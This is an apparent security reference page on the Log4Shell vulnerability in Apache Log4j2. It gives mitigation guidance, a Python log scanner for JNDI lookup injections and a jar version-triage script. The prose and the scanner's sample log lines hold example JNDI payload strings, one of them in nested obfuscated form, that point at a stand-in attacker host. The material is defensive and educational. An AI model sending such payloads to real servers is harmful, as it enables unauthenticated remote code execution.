Log4Shell (CVE-2021-44228)
Log4Shell is a critical RCE in Apache Log4j2's JNDI lookup feature — the most consequential vulnerability of 2021, exploited within hours of disclosure.
Definition
Log4Shell is the popular name for CVE-2021-44228, a remote code execution vulnerability in Apache Log4j2 disclosed in December 2021. The bug let an attacker include a JNDI lookup expression — `${jndi:ldap://attacker/Exploit}` — in any string that the application ultimately logged. Log4j parsed the expression, performed the JNDI lookup, fetched the attacker-hosted class from LDAP, and ran its static initialiser. The result was reliable unauthenticated RCE with a single HTTP request.
The blast radius was unprecedented. Log4j is bundled in essentially every Java application, including dozens of enterprise products whose vendors did not realise they shipped it. CISA added the CVE to KEV the same day. The exploit complexity was so low that `User-Agent: ${jndi:...}` payloads achieved RCE on huge portions of the internet within 24 hours.
How it works
Any string passed to a Log4j logging call — direct `logger.info(input)` or indirect via fields like `User-Agent` that frameworks log automatically — was scanned for `${...}` expressions. The JNDI lookup ran outbound to the attacker's LDAP server, which returned a Java class reference whose static initialiser executed arbitrary code at fetch time.
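The detection side of the mechanism above, as an added example that is not part of the original page: a small log scanner that looks for the lookup expression in whatever got logged. Because Log4j resolves lookups from the inside out, a detector that only greps for the literal `${jndi:` misses a payload whose inner lookup produces part of that keyword, so the scanner first approximates Log4j's resolution of nested `${...}` expressions (the `lower`, `upper` and `name:-default` forms) and only then checks the normalized string. The sample access-log lines are constructed; the `normalize_lookups`, `classify` and `scan` names are this example's own. It works on the decoded string only, so URL- or base64-encoded request fields must be decoded before being fed to it, and it should run over every field the application logs, not just `User-Agent`.

```python
import re
from typing import List, Optional, Tuple

# Constructed sample access-log lines (not from the original page). The last
# field is the logged User-Agent: lines 2 and 3 carry a JNDI lookup (line 3 in
# nested form), line 4 is benign text that merely contains a ${...} placeholder.
SAMPLE_LINES = [
    '10.0.0.5 - - "GET /login HTTP/1.1" 200 "Mozilla/5.0 (X11; Linux x86_64)"',
    '10.0.0.9 - - "GET / HTTP/1.1" 200 "${jndi:ldap://attacker.example/Exploit}"',
    '10.0.0.9 - - "GET / HTTP/1.1" 200 "${${lower:J}ndi:ldap://attacker.example/Exploit}"',
    '10.0.0.7 - - "GET /api HTTP/1.1" 200 "price=${amount}"',
]

INNERMOST = re.compile(r"\$\{([^${}]*)\}")   # a lookup with no lookup nested inside it
JNDI = re.compile(r"\$\{\s*jndi\s*:", re.IGNORECASE)
MARK = "\x01"   # temporary stand-in for "${" on expressions we leave unresolved


def _resolve(match: "re.Match") -> str:
    """Approximate Log4j's resolution of one innermost ${...} expression."""
    body = match.group(1)
    head, sep, rest = body.partition(":")
    if sep and head.lower() == "lower":
        return rest.lower()
    if sep and head.lower() == "upper":
        return rest.upper()
    if ":-" in body:                       # ${name:-default}: an unknown name yields the default
        return body.split(":-", 1)[1]
    return MARK + "{" + body + "}"         # unknown lookup: keep it, but stop re-matching it


def normalize_lookups(text: str, max_rounds: int = 10) -> str:
    """Resolve nested lookups from the inside out so the detector sees the final string."""
    for _ in range(max_rounds):
        resolved = INNERMOST.sub(_resolve, text)
        if resolved == text:
            break
        text = resolved
    return text.replace(MARK + "{", "${")


def classify(line: str) -> Optional[str]:
    """Verdict for one logged line, or None when nothing looks like a lookup injection."""
    norm = normalize_lookups(line)
    if JNDI.search(norm):
        return "jndi-lookup"
    if re.search(r"\$\{[^}]*\$\{", norm):   # lookups still nested after resolution: suspicious
        return "nested-lookup"
    return None


def scan(lines: List[str]) -> List[Tuple[int, str, str]]:
    """Return (line number, verdict, normalized line) for every line that triggers a verdict."""
    hits = []
    for idx, line in enumerate(lines, start=1):
        verdict = classify(line)
        if verdict:
            hits.append((idx, verdict, normalize_lookups(line)))
    return hits


if __name__ == "__main__":
    for idx, verdict, norm in scan(SAMPLE_LINES):
        print(f"line {idx}: {verdict}: {norm}")
```

The `nested-lookup` verdict is deliberately broad: legitimate user input almost never contains one lookup inside another, so anything the normalizer could not flatten is worth a look even when the `jndi` keyword never appears.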
Impact
Pre-auth RCE on the affected JVM. Worldwide exploitation within hours of disclosure.
Mitigation
Upgrade to Log4j 2.17.1 or later. Earlier patches (2.15.x, 2.16.x) addressed the bug incompletely and several follow-up CVEs (CVE-2021-45046, CVE-2021-45105) reopened variants. `-Dlog4j2.formatMsgNoLookups=true` mitigates older 2.10+ deployments. Block outbound LDAP / RMI at the network edge as defence-in-depth.
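Turning the mitigation guidance above into an inventory check, as an added example that is not part of the original page: the script opens a `log4j-core` jar, reads the version from its manifest (falling back to the file name), records whether the vulnerable `JndiLookup` class is present, and triages the result against the version thresholds the page gives (below 2.15 vulnerable, 2.15.x and 2.16.x incomplete, 2.17.1 or later fixed, the `formatMsgNoLookups` flag only relevant from 2.10 on). Two things the page does not cover are added as labelled caveats: a jar from which `org/apache/logging/log4j/core/lookup/JndiLookup.class` has been deleted is reported as mitigated rather than vulnerable, and the 2.3.x and 2.12.x lines (the Java 6 and Java 7 backports, which received their own fixes) are flagged for manual review instead of being judged by the 2.x thresholds. The sample jars are constructed in a temporary directory and contain no real bytecode; `inspect_jar`, `triage`, `make_sample_jar` and `run_demo` are this example's own names.

```python
import re
import tempfile
import zipfile
from pathlib import Path
from typing import List, Optional, Tuple

# The class that implements the JNDI lookup. Its presence in log4j-core is the
# vulnerable component; its absence indicates the jar was hardened by removing it.
JNDI_LOOKUP_CLASS = "org/apache/logging/log4j/core/lookup/JndiLookup.class"

Version = Tuple[int, int, int]


def parse_version(text: str) -> Optional[Version]:
    """Extract a major.minor[.patch] tuple from a manifest value or a file name."""
    m = re.search(r"(\d+)\.(\d+)(?:\.(\d+))?", text)
    if not m:
        return None
    return int(m.group(1)), int(m.group(2)), int(m.group(3) or 0)


def inspect_jar(path: Path) -> dict:
    """Read the version and the presence of JndiLookup.class from one jar."""
    with zipfile.ZipFile(path) as jar:
        names = set(jar.namelist())
        version = None
        if "META-INF/MANIFEST.MF" in names:
            manifest = jar.read("META-INF/MANIFEST.MF").decode("utf-8", "replace")
            m = re.search(r"^Implementation-Version:\s*(\S+)", manifest, re.MULTILINE)
            if m:
                version = parse_version(m.group(1))
    if version is None:                      # fall back to e.g. log4j-core-2.14.1.jar
        version = parse_version(path.name)
    return {"path": str(path), "version": version, "has_jndi_lookup": JNDI_LOOKUP_CLASS in names}


def triage(info: dict) -> Tuple[str, str]:
    """Map (version, JndiLookup present) to a status and a one-line action."""
    v = info["version"]
    if v is None or v[0] != 2:
        return "unknown", "no Log4j 2.x version found; review manually"
    if v >= (2, 17, 1):
        return "fixed", "2.17.1 or later"
    # Assumption not on the page: 2.3.1+ and 2.12.2+ are the Java 6/7 backport fixes.
    if (v[:2] == (2, 3) and v[2] >= 1) or (v[:2] == (2, 12) and v[2] >= 2):
        return "backport-review", "Java 6/7 backport line; check its own release notes"
    if v >= (2, 15, 0):
        return "partial", "pre-2.17.1 fix is incomplete (follow-up CVEs apply); upgrade to 2.17.1+"
    if not info["has_jndi_lookup"]:
        return "mitigated", "JndiLookup.class removed from the jar; still upgrade to 2.17.1+"
    if v >= (2, 10, 0):
        return "vulnerable", "upgrade; -Dlog4j2.formatMsgNoLookups=true is only a stop-gap"
    return "vulnerable", "upgrade; formatMsgNoLookups does not exist before 2.10"


def make_sample_jar(directory: Path, version: str, include_jndi_lookup: bool) -> Path:
    """Constructed stand-in for a log4j-core jar; not a real Log4j artifact."""
    path = directory / f"log4j-core-{version}.jar"
    with zipfile.ZipFile(path, "w") as jar:
        jar.writestr("META-INF/MANIFEST.MF",
                     f"Manifest-Version: 1.0\nImplementation-Version: {version}\n")
        if include_jndi_lookup:
            jar.writestr(JNDI_LOOKUP_CLASS, b"")   # placeholder bytes, not bytecode
    return path


# (version, JndiLookup.class present) for the constructed sample jars.
SAMPLES = [("2.14.1", True), ("2.14.1", False), ("2.16.0", True), ("2.17.1", True), ("2.3.0", True)]


def run_demo() -> List[Tuple[str, bool, str]]:
    """Build each sample jar, inspect it and return (version, has_jndi, status)."""
    results = []
    with tempfile.TemporaryDirectory() as tmp:
        for ver, keep in SAMPLES:
            info = inspect_jar(make_sample_jar(Path(tmp), ver, keep))
            status, _note = triage(info)
            results.append((ver, keep, status))
    return results


if __name__ == "__main__":
    for ver, keep, status in run_demo():
        print(f"log4j-core {ver:8} JndiLookup={'yes' if keep else 'no ':3} -> {status}")
```

In a real sweep the jar is often not a top-level file: it is nested inside a WAR, EAR or fat jar, or shaded into another artifact under a different name, which is exactly why vendors did not realise they shipped it. Walking nested archives and hashing `JndiLookup.class` regardless of the containing file name catches those cases; the manifest-only check above is the minimum, not the whole inventory.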
Examples
- CVE-2021-44228 — the original Log4Shell.
- CVE-2021-45046 — Log4Shell variant exploiting the incomplete 2.15 fix.
- CVE-2021-45105 — DoS variant in Log4j 2.16.